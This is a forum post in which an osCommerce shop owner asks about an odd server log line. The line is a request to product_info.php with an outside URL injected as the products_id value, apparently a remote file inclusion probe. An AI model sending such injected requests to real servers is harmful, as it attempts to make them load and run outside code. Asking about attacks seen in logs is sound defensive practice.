Strange page request in server logfile

Dear all,

I just took a closer look at my provider's server logs and found something odd. There are a number of page requests to the product_info.php that have a url given as products_id argument, here is a typical example (this one occured 147 times in the last three months, and there are quite a few others as well):

88.192.34.201 - - [23/Dec/2008:00:48:52 +0100] "GET /product_info.php?products_id=http://babycaleb.fortunecity.co.uk/index.htm? HTTP/1.1" 200 15460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

Could this be an attempt to do something malicious?

What exactly will osCommerce do with such a request?

I'm a little worried here.

If anyone has experience with similar requests or knows if osCommerce safely ignores such things, please let me know.

Best regards

Reiner
